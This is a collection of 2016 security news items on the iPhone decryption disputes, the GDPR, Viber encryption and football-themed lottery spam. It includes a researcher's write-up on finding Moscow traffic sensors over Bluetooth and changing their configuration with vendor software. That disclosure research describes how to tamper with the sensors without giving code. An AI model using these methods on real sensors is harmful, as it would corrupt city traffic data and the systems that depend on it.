The contents of the attachments are the standard stuff: the lottery was held by an authorized organization, the recipient’s address was randomly selected from a large number of email addresses, and in order to claim your prize you have to reply to the email and provide some personal information. We have recorded cases where the same attachment was sent in messages with a different text, but the theme of the email is essentially the same. The fraudsters also use different email addresses and change those used in the body of the message and the attachment.
We have also come across advertising spam in different languages, for example in Dutch, asking recipients to buy a 2-euro commemorative coin issued specifically for Euro 2016.

We expect to see a growth in football-themed spam as the start date of Euro 2016 approaches. This type of fraudulent spam can be one of the most dangerous for users: the perpetrators are unlikely to limit their activity to fake lotteries, and will start spreading various emails offering the chance to win tickets to the games, as was the case before the World Cup in Brazil. The amount of spam targeting users in France, which is hosting the championship, may also increase.



The FBI paid more than $1 million to hack the San Bernardino iPhone

In the San Bernardino case, it turned out that the FBI didn’t actually need Apple’s help to access the data in shooter Syed Rizwan Farook’s iPhone 5c. But if Apple had helped, it certainly would have been cheaper.

Speaking at a security conference in London, FBI Director James Comey was asked how much the bureau paid the third-party gray-hat hackers for the tool that broke into the iPhone. “A lot, more than I will make in the remainder of this job, which is seven years and four months, for sure. But it was in my view worth it.”
To read this article in full or to leave a comment, please click here



Opera browser build adds a first: Free, unlimited VPN for secure surfing

After successfully launching a version of its browser that offered ad blocking, Opera just won’t quit. On Wednesday night, the company released a free VPN service with unlimited bandwidth, built right into its latest beta. The Opera release is developer edition version 38.0.2204.0 for the Mac and the PC.
Opera also won’t make you pay for the amount of bandwidth that you route through the VPN—which would normally cost you about $48 per year.
A virtual private network spoofs your IP address, pretending that your PC is actually physically located in London, for example, when it’s actually sitting in Los Angeles. That offers all sorts of possibilities: It helps hide your identity when surfing, or allows you access to a website that you normally wouldn’t be able to see. VPNs are also common in countries like China, whose so-called “Great Firewall” insulates the Chinese Internet from the rest of the world.
To read this article in full or to leave a comment, please click here



Viber joins WhatsApp and Apple with end-to-end message encryption

Not wanting to be left behind in the pursuit of enhanced user security, Viber is adding end-to-end encryption (E2EE) following WhatsApp’s E2EE roll out earlier in April. Viber announced on Tuesday that E2EE would roll out to its users globally over the next two weeks. The new encryption will cover text, voice, and group chats, and will work across mobile and PC versions of Viber.

Viber with end-to-end encryption.
To read this article in full or to leave a comment, please click here



Microsoft cites new EU personal data rules in support of email dispute

Microsoft has cited new European data protection rules in support of its claim that the U.S. government should use inter-governmental agreements rather than a warrant to force the technology company to provide emails stored in Ireland that are required for an investigation.

The General Data Protection Regulation was adopted last week by the European Parliament with an aim to provide an unified data protection regime across member states. It was earlier adopted by the Council of the EU, and is to come into effect in a little over two years after its publication in the EU Official Journal. The legislation will replace the EU Data Protection Directive, which dates back to 1995.
To read this article in full or to leave a comment, please click here



Apple rebuts DOJ's appeal in N.Y. meth dealer's iPhone case

Apple last week opposed the Department of Justice’s renewed demand that it assist investigators in accessing a drug dealer’s iPhone, arguing that the government has not proved the company’s help is required.

“The government has utterly failed to satisfy its burden to demonstrate that Apple’s assistance in this case is necessary,” lawyers for the Cupertino company said in a brief (PDF) filed with a federal court in New York on Friday. “The government has made no showing that it has exhausted alternative means for extracting data from the iPhone at issue here, either by making a serious attempt to obtain the passcode from the individual defendant who set it in the first place … or by consulting other government agencies and third parties known to the government.”
To read this article in full or to leave a comment, please click here



How to trick traffic sensors

A detailed presentation of this research was delivered at RSA US 2016, and is available at https://www.rsaconference.com/writable/presentations/file_upload/tech-t09-smart-megalopolises.-how-safe-and-reliable-is-your-data.pdf
In the past two years traffic sensors have mushroomed in Russian cities. Drivers using speed camera detectors were the first to spot the white boxes stuck to posts along the roadside. Their devices, designed to warn drivers about traffic enforcement cameras, react to the signals emanating from the new sensors in the same way they do to the radar guns used by traffic police. Helping enforce the speed limit is merely a positive side effect, however; the city authorities installed the sensors for a completely different reason. The devices count the number of cars of varying size in each lane, determine their average speed, and send the data to a unified traffic control center.

A traffic sensor in Moscow
As a result, the city authorities receive information about traffic intensity, which allows them to, for example, adjust traffic light phasing or plan further road infrastructure. The weekly reports issued by Moscow’s traffic authorities present information about the slowest and the fastest highways, based on data coming from both the Center for Road Traffic Management and from Yandex. While the latter’s data comes from apps running on users’ smartphones, the former would not be able to collect its data without the road infrastructure that will be discussed here.

Each week the Moscow city authorities publish data about the city’s fastest and slowest highways
These sensors are the lowest tier of ‘smart city’ infrastructure – they collect raw data about traffic and pass it on; without that data, no analysis can be done and systems cannot be configured properly. Therefore, the information coming from the sensors has to be accurate. But is that actually the case? Can an outsider manipulate the operation of the sensors and the information that they collect? We will try to answer these questions and identify any improvements that can be made to the urban IT infrastructure.
How to search for devices and information about them
Any research begins by collecting all the available data, and research into embedded systems, to which traffic sensors belong, is no exception. Even in a narrow market segment, you cannot know all sensor types and models by sight unless you are dealing with them professionally every day. The odds are that you won’t be able to immediately identity the manufacturer of a device by just looking at it. This makes all the logos and manufacturer labels on devices all the more valuable.
If you do succeed in identifying the model of a road sensor just by looking at it, you can find various documentation on the vendor’s site (or that of their integrator), and, if you are lucky enough, you will also find the software used for working with the devices. You will almost certainly find a marketing leaflet about your device; there is also a good chance you will find a larger sales-oriented document. It is also not uncommon to come across documentation, but finding a full-fledged technological description with the device’s command system is a rare piece of luck.
It is practical to automate the process of working with the sensors, so you don’t have to sit under each and every device with a laptop. Nowadays, such automation is quite normal – wireless connections are no longer a rarity for ‘smart city’ components. However, to ensure such automation, you first need to know which communication protocol each sensor uses, and how to separate the devices you need from all the other devices.
For this purpose, you can use any identifiers, including peculiarities in how the devices communicate their data. For example, most MAC addresses are reserved to specific manufacturers (however, anonymous MAC addresses also exist). As well as numeric IDs, devices also typically have alphabetic names that may also follow some type of standard, i.e. the device model plus an incremental index.
All of this makes it possible to write a scanner to search for devices that are of interest to us. One of the sensor models installed in Moscow uses Bluetooth for data communication. These devices have both MAC addresses and ‘friendly names’ that are quite distinctive, so we can add only these traffic sensors to the list and filter out all nearby smartphones and TV sets. A discussion on Bluetooth security goes beyond the scope of this topic, so we will not talk here of compromising Bluetooth devices. We informed the Moscow city authorities about the configuration drawbacks in November 2015.

Traffic sensor records saved to a database
I used Python, PostgreSQL and a bit of C. In real time, as I drive by each traffic sensor, the scanner identifies each device’s MAC address, friendly name and coordinates. The fields with the vendor name and the physical address are filled out later on a separate pass through the database based on the data already collected. Determining the device’s physical address from coordinates is, to a certain degree, a time-consuming procedure, so it shouldn’t be done simultaneously while searching for devices. Establishing a Bluetooth connection is not fast either, so if you want to find traffic sensors, you’ll have to drive slowly.
What can be done with the firmware
The openness shown by the manufacturers to installation engineers, their readiness to give them access to tools and documents, automatically means they are open to researchers. (I respect this sort of approach; in my view, this sort of openness combined with a ‘bug bounty’ approach yields better results than secrecy.) After selecting any of the identified sensors, you can install the device configuration software supplied by the vendor on your laptop, drive to the location (the physical address saved in the database), and connect to the device.
As we do in any research of embedded system security, we first of all check if it’s possible to reinstall the firmware on the device.

The configuration software allows the firmware on the traffic sensor to be changed
Yes, we can install new firmware on the device via this wireless connection designated for servicing purposes. It is just as easy to find the manufacturer’s firmware and as it is its software. The firmware looks reminiscent of Intel iHex or Motorola SREC, but this is the manufacturer’s proprietary product. If we remove the overhead information (‘:’ – the write instruction, serial numbers, memory addresses and checksums) from the data blocks for the digital signal processor (DSP) and the main processing unit (MPU), we obtain the clean code. However, we don’t know the architecture of the controllers in the device, so we cannot simply open the file with a disassembler.

The traffic sensor firmware
Oddly enough, LinkedIn helps out here – it’s not just a handy resource for careerists and HR departments. Sometimes the device architecture is not a secret, and engineers who used to work for the manufacturer may be willing to talk about it. Now, as well as the file, we also have an understanding of the architecture which the firmware was compiled for. However, our good fortune only lasts until we launch IDA.

You can find the controller types even if they aren’t specified in the documentation
Even when we know the architecture, the firmware remains a meaningless jumble of bytes. However, we could find out from the same engineer how exactly the firmware is encrypted, as well as the encryption algorithms and key tables. I didn’t have the device to hand, so at that stage I decided this black box mode of firmware modification was showing little promise, and set it aside. We have to admit that in this specific case the microelectronics engineers know how to protect firmware. However, this did not mean the end of the road for our sensor research.
Only trucks travel at night
Firmware modification is “good” in that new functional capabilities can be added. However, there is sufficient functionality in the manufacturer’s standard software. For example, the device has about 8 MB of memory that is used to keep a copy of traffic data until the memory is full. This memory can be accessed. The firmware allows you to change the way that passing vehicles are classified according to their length, or change the number of lanes. Would you like a copy of the information collected on traffic? No problem. Would you like to classify all vehicles as trucks driving in the right lane? You can do that too. Of course, this will affect the accuracy of the statistics that are collected, with all ensuing consequences.

Sample of the data traffic sensors collect and pass along. The same data is stored on the device
If someone wants to get a copy of Moscow traffic statistics or manipulate the data, they will have to walk or drive around all the traffic sensors; however, they won’t have to launch software for each of the thousands of sensors and modify the settings manually. In this specific case, there is a description of the proprietary system of commands for the devices. This is not something that you come across a lot when researching embedded systems. In any case, after establishing a connection to the traffic sensor using the manufacturer’s software, the commands are no longer a secret – they are visible using a sniffer. Even then, there’s a description in English that saves us the trouble of analyzing the machine-language communication protocol.

Documented device commands make traffic analysis unnecessary
Bluetooth services are not actually implemented on the traffic sensor; the wireless protocol in this case is only a data communication environment. The data is communicated via a regular serial port. Software handling of such ports is no different from reading and writing to files, the code for sending commands is trivial. For these purposes, it’s not even necessary to implement the usual multithreaded port handling – it’s sufficient to send bytes and receive the response in a single thread.
To sum up, a car driving slowly around the city, a laptop with a powerful Bluetooth transmitter and scanner software is capable of recording the locations of traffic sensors, collecting traffic information from them and, if desired, changing their configurations. I wouldn’t say that traffic stats are a major secret, but tampering with sensor configurations could affect their validity. And that data could be used as a basis for controlling ‘smart’ traffic lights and other traffic equipment.

The sensor sent a response, the command has been accepted. Because we know the command system, it is easy to ‘translate’ the response
What can be done?
It turns out that the answers to both questions we raised at the beginning are negative: traffic data is not protected, and it can be manipulated. Why is that? Well, there was no authorization except that required for Bluetooth, and that was not configured properly. The manufacturer of the road sensors we examined is very generous when it comes to service engineers, with a lot of information about the devices publicly available on the manufacturer’s official website and elsewhere. Personally, I agree with the manufacturer and respect them for this, as I don’t think the “security through obscurity” approach makes much sense these days; anyone determined enough will find out the command system and gain access to the engineering software. In my view, it makes more sense to combine openness, big bounty programs and a fast response to any identified vulnerabilities, if for the only reason that the number of researchers will always be bigger than the number of employees in any information security department.
At the installation stage, it makes sense to avoid using any standard identifiers. Obviously, manufacturers need to advertise their products, and the servicing teams may need to collect additional information from the adhesive labels on a device, but besides the convenience there are also issues of information security to consider. Last but not least, it’s not worth relying solely on the standard identification implemented in well-known protocols. Any additional proprietary protection that is properly implemented will be relevant and make penetration much more difficult.
A detailed presentation of this research was delivered at RSA US 2016, and is available at RSA conference website.



Chrome extensions will soon have to tell you what data they collect

Google is about to make it harder for Chrome extensions to collect your browsing data without letting you know about it, according to a new policy announced Friday.
Starting in mid-July, developers releasing Chrome extensions will have to comply with a new User Data Policy that governs how they collect, transmit and store private information. Extensions will have to encrypt personal and sensitive information, and developers will have to disclose their privacy policies to users.
Developers will also have to post a “prominent disclosure” when collecting sensitive data that isn’t related to a prominent feature. That’s important, because extensions have tremendous power to track users’ browsing habits and then use that for nefarious purposes.
To read this article in full or to leave a comment, please click here



Microsoft sues US government over secret requests for user data

Microsoft has sued the U.S. government in an attempt to strike down a law allowing judges to gag tech companies when law enforcement agencies want access to their users’ data.

The lawsuit, filed Thursday in the U.S. District Court for the Western District of Washington, argues that a section of the Electronic Communications Privacy Act is unconstitutional for requiring tech companies to keep requests for data under wraps. 

Microsoft argued the law is unconstitutional under the First Amendment, by limiting the company’s freedom of speech, as well as under the Fourth Amendment’s due process protections. 
To read this article in full or to leave a comment, please click here



EU gives companies two years to comply with sweeping new privacy laws

Companies could face massive fines in 25 European Union countries if they mishandle citizens’ personal information, under a new privacy law due to take effect in 2018.
New age restrictions will mean no more Facebook or other social media for European pre-teens.
Today, fines for violations of EU data protection rules are typically limited to a few tens of thousands of euros, or hundreds of thousands in exceptional cases. That’s hardly enough to upset companies such as Facebook or Google, which both reported billions of dollars in net income last year.
From 2018, though, data protection authorities will be able to impose fines of up to 4 percent of a company’s worldwide revenue for breaches of the new privacy rules approved by the European Parliament on Thursday afternoon. For Google, the fine itself could now be in the billions of dollars. 
To read this article in full or to leave a comment, please click here



EU gives companies two years to comply with sweeping new privacy laws

Companies could face massive fines in 25 European Union countries if they mishandle citizens’ personal information, under a new privacy law due to take effect in 2018.
New age restrictions will mean no more Facebook or other social media for European pre-teens.
Today, fines for violations of EU data protection rules are typically limited to a few tens of thousands of euros, or hundreds of thousands in exceptional cases. That’s hardly enough to upset companies such as Facebook or Google, which both reported billions of dollars in net income last year.
From 2018, though, data protection authorities will be able to impose fines of up to 4 percent of a company’s worldwide revenue for breaches of the new privacy rules approved by the European Parliament on Thursday afternoon. For Google, the fine itself could now be in the billions of dollars. 
To read this article in full or to leave a comment, please click here



Apple probably won’t find out how the FBI hacked the San Bernardino iPhone

The strange tale of the San Bernardino iPhone seems like it’s almost over, although it touched off a national debate about encryption that’s just getting started. Apple probably won’t find out what method was used by the third-party firm that broke into the iPhone 5c used by shooter Syed Rizwan Farook, reports Reuters.

The government says that the unidentified international firm that did the hack has legal ownership of the method, so while the FBI got the data it wanted, it’s unable to disclose the method to Apple. There’s actually a system in place, known as the Vulnerabilities Equities Process, that’s designed to evaluate flaws discovered by the government’s own agencies to determine if they should be disclosed to the technology companies who can patch them, or if the vulnerabilities can remain secret to be used by the NSA, FBI, or other agencies.
To read this article in full or to leave a comment, please click here



More than 43,000 sign petition against U.S. encryption-breaking bill

More than 43,000 people have signed a petition against proposed U.S. legislation that would require tech companies to break into their users’ encrypted data when ordered to by a judge.

The proposal, from Senators Richard Burr and Dianne Feinstein, would require smartphone OS developers and other tech vendors to assist law enforcement agencies by breaking their own security measures.

CREDO Action, a progressive activist group, launched a petition opposing the Compliance with Court Orders Act on Tuesday, and more than 43,000 people had signed it by early Thursday afternoon.
To read this article in full or to leave a comment, please click here



EU plan to collect, not share, air traveler data is ‘absurd'

Air passengers entering or leaving the European Union will have their movements kept on file by police authorities from 2018 under draft legislation approved by the European Parliament.
Critics, however, say a lack of provisions to share the data severely limits the plan’s usefulness.
Airlines running flights into or out of the EU must hand over the data to national Passenger Information Units (PIUs) that will hold the data for law enforcers. Member states may choose to gather data from travel agencies and to retain information about passengers on flights within the EU too.
However, there will be no centralized EU database of arriving and departing passengers, and no automatic sharing of data between the various national PIUs. With open land borders between countries in the Schengen Area, and no mandatory collection of information on intra-EU flights, it will be difficult for investigators to use the data to determine whether a person of interest is in the EU.
To read this article in full or to leave a comment, please click here